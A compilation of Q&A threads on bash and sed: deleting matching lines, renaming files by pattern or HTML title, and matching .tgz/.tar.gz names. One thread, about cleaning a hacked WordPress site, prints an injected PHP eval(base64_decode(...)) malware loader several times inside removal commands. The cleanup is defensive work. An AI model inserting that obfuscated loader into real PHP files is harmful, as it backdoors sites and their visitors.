bash script with simple regular expression - regex

Consider the following bash script with a simple regular expression:
for f in "$FILES"
do
echo $f
sed -i '/HTTP|RT/d' $f
done
This script should read every file in the directory specified by FILES and remove the lines containing 'HTTP' or 'RT'. However, it seems that the OR part of the regular expression is not working. That is, if I just have sed -i '/HTTP/d' $f, it removes all lines containing HTTP, but I cannot get it to remove both HTTP and RT.
What must I change in my regular expression so that lines with HTTP or RT are removed?
Thanks in advance!

Two ways of doing it (at least):
Having sed understand your regex:
sed -E -i '/HTTP|RT/d' $f
Specifying each token separately:
sed -i '/HTTP/d;/RT/d' $f
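The original attempt fails because, without -E, sed uses basic regular expressions, where a bare | is just a literal character. Here is a minimal sketch to compare the variants on a throwaway file (the temp file and its sample lines are made up for illustration):

```shell
# Throwaway sample file; the contents are invented for this demo.
tmp=$(mktemp)
printf '%s\n' 'keep me' 'see HTTP link' 'RT something' 'also keep' > "$tmp"

# Basic regex: "|" is literal, so no line matches and nothing is deleted.
bre_out=$(sed '/HTTP|RT/d' "$tmp")

# Extended regex (-E): "|" means alternation.
ere_out=$(sed -E '/HTTP|RT/d' "$tmp")

# Two separate delete commands, no alternation needed.
two_out=$(sed '/HTTP/d;/RT/d' "$tmp")

printf 'BRE:\n%s\n\nERE:\n%s\n\ntwo commands:\n%s\n' "$bre_out" "$ere_out" "$two_out"
rm -f "$tmp"
```

No -i is used here, so the sample file itself is never modified; the results only go to the terminal.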

Before you do anything, run with the opposite, and PRINT what you plan to DELETE:
sed -n -e '/HTTP/p' -e '/RT/p' $f
Just to be sure you are deleting only what you want to delete before actually changing the files.
"It's not a question of whether you are paranoid or not, but whether you are paranoid ENOUGH."

Well, first of all, it will process all WORDS in the FILES variable.
If you want it to do all files in the FILES directory, then you need something like this:
for f in $( find $FILES -maxdepth 1 -type f )
do
echo $f
sed -i -e '/HTTP/d' -e '/RT/d' $f
done
You just need two "-e" options to sed.
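One caveat: looping over $( find ... ) splits file names at whitespace. Here is a sketch that iterates over a glob instead, assuming FILES holds a directory path as in the question (the temp directory and file names below are invented). It uses -i.bak, the attached-suffix form that both GNU and BSD sed accept, so each original is kept as a backup:

```shell
# Demo directory standing in for $FILES; names and contents are invented.
FILES=$(mktemp -d)
printf '%s\n' 'first' 'an HTTP line' 'last' > "$FILES/plain.txt"
printf '%s\n' 'RT this' 'stays' > "$FILES/with space.txt"

for f in "$FILES"/*; do
    [ -f "$f" ] || continue      # skip subdirectories and an unmatched glob
    echo "$f"
    # -i.bak edits in place and keeps the original as "$f.bak".
    sed -i.bak -e '/HTTP/d' -e '/RT/d' "$f"
done

# Capture the results, then clean up the demo directory.
plain_after=$(cat "$FILES/plain.txt")
spaced_after=$(cat "$FILES/with space.txt")
rm -rf "$FILES"
```

The glob is expanded once before the loop starts, so the .bak files created along the way are not processed themselves.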

Related

replace string with underscore and dots using sed or awk

I have a bunch of files with filenames composed of underscore and dots, here is one example:
META_ALL_whrAdjBMI_GLOBAL_August2016.bed.nodup.sortedbed.roadmap.sort.fgwas.gz.r0-ADRL.GLND.FET-EnhA.out.params
I want to remove the part that contains .bed.nodup.sortedbed.roadmap.sort.fgwas.gz. so the expected filename output would be META_ALL_whrAdjBMI_GLOBAL_August2016.r0-ADRL.GLND.FET-EnhA.out.params
I am using these sed commands but neither one works:
stringZ=META_ALL_whrAdjBMI_GLOBAL_August2016.bed.nodup.sortedbed.roadmap.sort.fgwas.gz.r0-ADRL.GLND.FET-EnhA.out.params
echo $stringZ | sed -e 's/\([[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.\)//g'
echo $stringZ | sed -e 's/\[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.//g'
Any solution in sed or awk would help a lot.
Don't use external utilities and regexes for such a simple task! Use parameter expansions instead.
stringZ=META_ALL_whrAdjBMI_GLOBAL_August2016.bed.nodup.sortedbed.roadmap.sort.fgwas.gz.r0-ADRL.GLND.FET-EnhA.out.params
echo "${stringZ/.bed.nodup.sortedbed.roadmap.sort.fgwas.gz}"
To perform the renaming of all the files containing .bed.nodup.sortedbed.roadmap.sort.fgwas.gz, use this:
shopt -s nullglob
substring=.bed.nodup.sortedbed.roadmap.sort.fgwas.gz
for file in *"$substring"*; do
echo mv -- "$file" "${file/"$substring"}"
done
Note. I left echo in front of mv so that nothing is going to be renamed; the commands will only be displayed on your terminal. Remove echo if you're satisfied with what you see.
Your regex doesn't really feel too much more general than the fixed pattern would be, but if you want to make it work, you need to allow for more than one lower case character between each dot. Right now you're looking for exactly one, but you can fix it with \+ after each [[:lower:]] like
printf '%s' "$stringZ" | sed -e 's/\([[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.\)//g'
which with
stringZ="META_ALL_whrAdjBMI_GLOBAL_August2016.bed.nodup.sortedbed.roadmap.sort.fgwas.gz.r0-ADRL.GLND.FET-EnhA.out.params"
gives me the output
META_ALL_whrAdjBMI_GLOBAL_August2016.r0-ADRL.GLND.FET-EnhA.out.params
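Note that \+ is not part of POSIX basic regular expressions (GNU sed accepts it as an extension). With -E the same idea can be written with + and a repetition count. This is only a sketch, and it assumes the unwanted part is always seven lowercase, dot-terminated components:

```shell
stringZ="META_ALL_whrAdjBMI_GLOBAL_August2016.bed.nodup.sortedbed.roadmap.sort.fgwas.gz.r0-ADRL.GLND.FET-EnhA.out.params"

# ([[:lower:]]+\.){7} matches seven consecutive "lowercase letters + dot" groups.
cleaned=$(printf '%s\n' "$stringZ" | sed -E 's/([[:lower:]]+\.){7}//')
printf '%s\n' "$cleaned"
```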
Try this:
#!/bin/bash
for line in META*
do
f2=$(printf '%s\n' "$line" | sed 's/\.bed\.nodup\.sortedbed\.roadmap\.sort\.fgwas\.gz//')
mv -- "$line" "$f2"
done

deleting and replacing string inside .php file

I am having some problems with loading a PHP file and then replacing its content with something else.
My code looks like this:
$pattern="*random text*"
$rep=" "
$where=`ls *.php`
find -f $where -name "*.php" -exec sed -i 's/$pattern/$rep/g' {} \;
This won't load the entire line of text. Also, is there a limit on how many characters $pattern can hold?
Also, is there a way to make this .sh file execute every 15 minutes, for example?
I am using Mac OS X.
Thanks!
The syntax $var="value" is wrong. You need to say var="value".
If you just want to do something on files matching *.php in a single directory, there is no need to use find. Just use a for loop:
pattern="*random text*"
rep=" "
for file in *.php
do
sed -i "s/$pattern/$rep/g" "$file"
done
See the usage of sed "s/$var/.../g" instead of sed 's/$var/.../g'. The double quotes expand the variables within the expression; otherwise, you would be looking for a literal $var.
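The difference is easy to check on a single string. This is a small sketch with made-up sample values (no files are touched):

```shell
pattern="random text"
rep="X"
line="some random text here"

# Single quotes: the shell leaves $pattern and $rep alone, so sed searches
# for the literal text "$pattern" and finds nothing to replace.
single=$(printf '%s\n' "$line" | sed 's/$pattern/$rep/g')

# Double quotes: the shell expands both variables before sed sees the script.
double=$(printf '%s\n' "$line" | sed "s/$pattern/$rep/g")

printf 'single: %s\ndouble: %s\n' "$single" "$double"
```

Keep in mind that with double quotes any / or regex metacharacter inside $pattern becomes part of the sed script, so such values would need escaping first.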
Note that sed -i alone does not work in OS X, so you probably have to say sed -i ''.
Example of replacement:
Given a file:
$ cat a
hello
<?php eval(1234567890) regular php code ?>
bye
Let's remove everything from within eval():
$ sed -r 's/(eval\()[^)]*/\1X/' a
hello
<?php eval(X) regular php code ?>
bye

Pass sed output to mv

I'm trying to batch rename text files according to a string they contain.
I used sed to isolate the pattern with \( and \) as I couldn't get this to work in grep.
sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt | mv *.txt $sed.txt
(the text I want to use as filename is between html title tags)
Where I wrote $sed would be the output of sed.
hope that's clear!
A simple loop in bash can accomplish this. If each file is valid HTML, meaning you have only one <title> tag in the file, you can rename them all this way:
for file in *.txt; do
mv "$file" "$(sed -n 's/<title>\([^<]*\)<\/title>/\1/p;' "$file" | sed -e 's/[[:space:]][[:space:]]*/_/g')".txt
done
So, if you have files 1.txt, 2.txt and 3.txt, each with cat, dog and my hippo in their TITLE tags, you'll end up with cat.txt, dog.txt and my_hippo.txt after the above loop.
EDIT: quoted $file in case there are spaces in filenames; and added a second sed to convert any whitespace in the <title> tag to _'s in resulting filenames. NOTE the [[:space:]] class in the second sed command matches both space and tab characters.
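Before renaming anything for real, it may help to see the names that would be produced. Here is a dry-run sketch; title_to_name is a hypothetical helper name, the sample file is invented, and it assumes the opening and closing title tags sit on the same line:

```shell
# Print the new base name derived from the first <title>...</title> line.
title_to_name() {
    sed -n 's/.*<title>\([^<]*\)<\/title>.*/\1/p' "$1" |
        head -n 1 |
        sed 's/[[:space:]][[:space:]]*/_/g'
}

# Demo on a throwaway file (name and contents are invented).
tmpdir=$(mktemp -d)
printf '%s\n' '<html><head>' '<title>my hippo</title>' '</head></html>' > "$tmpdir/3.txt"

for file in "$tmpdir"/*.txt; do
    new=$(title_to_name "$file")
    [ -n "$new" ] || continue               # no title found: leave the file alone
    echo mv -- "$file" "$tmpdir/$new.txt"   # drop "echo" to really rename
done

hippo_name=$(title_to_name "$tmpdir/3.txt")
rm -rf "$tmpdir"
```

Files without a title are skipped instead of being renamed to ".txt". A title containing a / would still need extra handling.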
You can enclose expression in grave accent characters (`) to make it insert its output to the place you want. Try:
mv *.txt `sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt`.txt
It is rather not flexible, but should work.
(I haven't used it in a while and cannot test it now, so I might be wrong).
Here is the command I would use:
for i in *.txt ; do
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
done
The sed substitution searches for the pattern in each one of your .txt files. For each file it creates the string mv 'file_name' 'found_pattern'.
With the e command at the end of sed commands, this resulting string is directly executed in terminal, thus it renames your files.
Some hints:
Note the use of =s instead of /s as delimiters for the sed substitution: it's more readable as you already have /s in your pattern (you could use many other symbols if you don't like =). And in this way you don't have to escape the / in your pattern.
The e command for sed executes the created string.
(I mean the e right before the closing double quote in:
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
)
So use it with caution! I would recommend first running the line without the final e: it won't execute any mv command, but will just print what would be executed if you were to add the e.
What I read from your question is:
you have a number of text (html) files in a directory
each file contains at least the tag <title> ... </title>
you want to extract the content (elements.text) and use it as filename
last you want to rename that file to the extracted filename
Is this correct?
So, then you need to loop through the files, e.g. with xargs or find
ls *.txt | xargs -i\{\} command "{}" ...
find -maxdepth 1 -type f -name '*.txt' -exec command "{}" ... \;
I always write the xargs substitute as -i\{\} because the resulting command stays compatible when I switch to find and its {} substitute.
Next, the -maxdepth option keeps find from descending into subdirectories; if there are none, you can leave it out.
command could be something very simple like echo "Testing File: {}" or a really small script if you use it with bash:
find . -name '*.txt' -exec bash -c 'CUR_FILE="{}"; echo "Working on: $CUR_FILE"; ls -l "$CUR_FILE";' \;
The big decision for your question is: how to get the text from title element.
A simple solution (suitable if opening and closing tag is on same textline) would be by grep
A more solid solution is to use a HTML Parser and navigate by DOM operation
The simple solution is based on:
get the title line
remove everything before and after the title content
So do it together:
ls *.txt | xargs -i\{\} bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"'
Same with usage of find:
find . -maxdepth 1 -type f -name '*.txt' -exec bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"' \;
Hopefully it is what you expected.
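A variation worth considering: instead of embedding {} inside the bash -c string, the file name can be handed over as a positional argument, so unusual characters in the name are never parsed as shell code. This is a sketch only, with an invented temp directory and sample file:

```shell
tmpdir=$(mktemp -d)
printf '%s\n' '<title>cat</title>' > "$tmpdir/1.txt"

# "_" fills $0 of the inner shell; find passes each file name as $1.
find "$tmpdir" -maxdepth 1 -type f -name '*.txt' -exec bash -c '
    title=$(sed -n "s#.*<title>\([^<]*\)</title>.*#\1#p" "$1" | head -n 1)
    [ -n "$title" ] || exit 0            # no title line: do nothing
    mv -- "$1" "$(dirname "$1")/$title.txt"
' _ {} \;

renamed=$(ls "$tmpdir")
printf '%s\n' "$renamed"
rm -rf "$tmpdir"
```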

Regexp for extensions tgz, tar.gz, TGZ and TAR.GZ

I'm trying to get a regexp (in bash) to identify files with only the following extensions:
tgz, tar.gz, TGZ and TAR.GZ.
I tried several but can't get it to work.
I'm using this regexp to select only the files with those extensions, to do some work with them:
if [ -f $myregexp ]; then
.....
fi
thanks.
Try this:
#!/bin/bash
# no case match
shopt -s nocasematch
matchRegex='\.(tgz|tar\.gz)$'
for f in *
do
# display filtered files (the regex variable must stay unquoted, otherwise bash matches it as a literal string)
[[ -f "$f" ]] && [[ "$f" =~ $matchRegex ]] && echo "$f";
done
I have found an elegant way of doing this:
shopt -s nocasematch
for file in *;
do
[[ "$file" =~ .*\.(tar\.gz|tgz)$ ]] && echo "$file"
done
This may suit you, since you seem to want to use if and a bash regex. The =~ operator checks whether a string matches a regular expression. Also, shopt -s nocasematch has to be set to perform a case-insensitive match.
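To use this inside an if, the test can be wrapped in a small function. Here is a sketch for bash; is_tarball is a hypothetical name and the sample file names are invented:

```shell
# Requires bash. Succeeds when the name ends in .tgz or .tar.gz, in any letter case.
is_tarball() {
    local re='\.(tgz|tar\.gz)$'
    local rc
    shopt -s nocasematch
    [[ $1 =~ $re ]]          # regex kept in an unquoted variable
    rc=$?
    shopt -u nocasematch     # note: this also clears a setting the caller made
    return "$rc"
}

for name in backup.tgz SITE.TAR.GZ notes.gz guitar.gz; do
    if is_tarball "$name"; then
        echo "match:    $name"
    else
        echo "no match: $name"
    fi
done
```

Putting the alternation inside one group, followed by a single $, is what keeps a name such as guitar.gz from matching.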
Use this pattern
.*\.(tgz|tar\.gz)$
But how to make a regular expression case-insensitive? It depends on the language you use. In JavaScript they use /pattern/i, in which, i denotes that the search should be case-insensitive. In C# they use RegexOptions enumeration.
Depends on where you want to use this regex. If with GREP, then use egrep with -i parameter, which stands for "ignore case"
egrep -i "\.(tgz|tar\.gz)$"
Write 4 regexes, and check whether the file name matches any of them. Or write 2 case-insensitive regexes.
This way the code will be much more readable (and easier) than writing 1 regex.
You can even do it without a regex (a bit wordy though):
for f in *.[Tt][Gg][Zz] *.[Tt][Aa][Rr].[Gg][Zz]; do
echo $f
done
In bash? Use curly brackets, *.{tar.gz,tgz,TAR.GZ,TGZ} or even *.{t{ar.,}gz,T{AR.,}GZ}. Thus, ls -l *.{t{ar.,}gz,T{AR.,}GZ} on the command-line will do a detailed listing of all files with the matching extensions.

Command line find a large string and replace on all files in a subdirectory

I've got a hacked wordpress install I'd like to clean up. Every single .php file has had this inserted at the top:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
I'd like to replace that string with nothing in every .php file in the wordpress directory including subs. What's my best option? I've got bash, python, perl, php and so on.
I've tried:
perl -pi -e 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
Bareword found where operator expected at -e line 1, near "s/<?php\ /**/eval"
syntax error at -e line 1, near "s/<?php\ /**/eval"
Identifier too long at -e line 1.
and
sed -i 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
sed: -e expression #1, char 15: unknown option to `s'
#!/usr/bin/perl
use warnings;
use strict;
use File::Find;
# get a list of files
local @ARGV;
find sub {push @ARGV, $File::Find::name if /\.php$/}, '.';
# do in-place editing
$^I = '.bak';
while (<>) {
print unless $_ eq "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>\n";
}
Note that your search string already contains '/', which is the default reg-exp delimiter and the one you are using in both your perl and sed commands.
You can either escape all those like '\/' OR you can use a different char for the reg-exp delimiter. For sed, try
sed -i 's#<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>##g' *.php
For some seds, you have to 'tell' sed that you are changing the delimiter. Only the initial reg-exp delimiter needs an escape char, i.e. sed -k 's\#<....##g' *.php
I hope this helps.
P.S. as you appear to be a new user, if you get an answer that helps you please remember to mark it as accepted, and/or give it a + (or -) as a useful answer.
The problem is that '/' exists in the string you want to match, and you are using '/' as your pattern delimiter. Luckily, Perl allows you to specify alternate delimiters, so use one that is not in the string you are matching:
perl -pn -i.bak -e "s{<?php\ /\*\*/eval\(base64_decode\('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\)\);\ \?>}{}g;" `find . -name '*.php'`
I modified the command a bit. It is always good practice to create backup files when doing in-place edits in case there is an error or you need to verify (via diff) that the command did what you expect (I have a perl program that allows me to easily rename the .bak files back in case I need to reset things).
I also use a find command to get the list of all .php files in and below the current directory. If working in a flat directory, your *.php is sufficient.
You also need to escape regex specials in the string you want to match. For example, the '*', '?', '(' and ')' characters need to be escaped.
If the command works as expected, you can run the following command to remove the .bak files:
/bin/rm `find . -name '*.bak'`
find ./*php | xargs -t -i perl -pi -e "s/<\?php\s+\/\*\*\/eval\(base64_decode\(\'\S+\'\)\);\s+\?>//;" {}
Feel free to substitute the ginormous base64 string instead of \S+
Try this:
sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//' *.php
Things I changed:
escaped all regexp symbols in your code (e.g. (, ), * and ?)
replaced ' with '\'' in your code, which is the only way to put a ' in a '-delimited string in bash
If you want to recursively replace *.php even in subdirectories of this directory:
find . -name '*.php' -print0 | xargs -0 sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//'
Note that I've used -print0 and -0 so it doesn't break with files with spaces.
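Since most of the trouble in this thread comes from escaping regex and shell metacharacters, a fixed-string comparison may be simpler. This sketch assumes the injected code sits on a line of its own (the same assumption the Perl script earlier in this thread makes). strip_exact_line is a hypothetical helper name, and 'PLACEHOLDER' stands in for the long base64 payload:

```shell
# Print file $2 without the lines that are exactly equal to the literal string $1.
strip_exact_line() {
    # -F: fixed string, -x: whole-line match, -v: invert the selection.
    # grep exits with 1 when nothing is left to print; that is not an error here.
    grep -vxF -e "$1" -- "$2" || [ "$?" -eq 1 ]
}

# A quoted here-document keeps the shell from interpreting anything in the string.
IFS= read -r needle <<'EOF'
<?php /**/eval(base64_decode('PLACEHOLDER')); ?>
EOF

# Demo on a throwaway file (contents invented).
tmpdir=$(mktemp -d)
printf '%s\n' "$needle" '<?php echo "hello"; ?>' > "$tmpdir/index.php"

cleaned=$(strip_exact_line "$needle" "$tmpdir/index.php")
printf '%s\n' "$cleaned"
rm -rf "$tmpdir"
```

To apply it for real, the output would be written to a temporary file and moved over the original, ideally after keeping a backup copy.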
Here's a bash 4+ script
#!/bin/bash
shopt -s globstar
shopt -s nullglob
for php in **/*.php
do
data=$(<"$php")
a=${data%%<?php*}
echo "$a ${data#*?>}" > t && mv t "$php"
done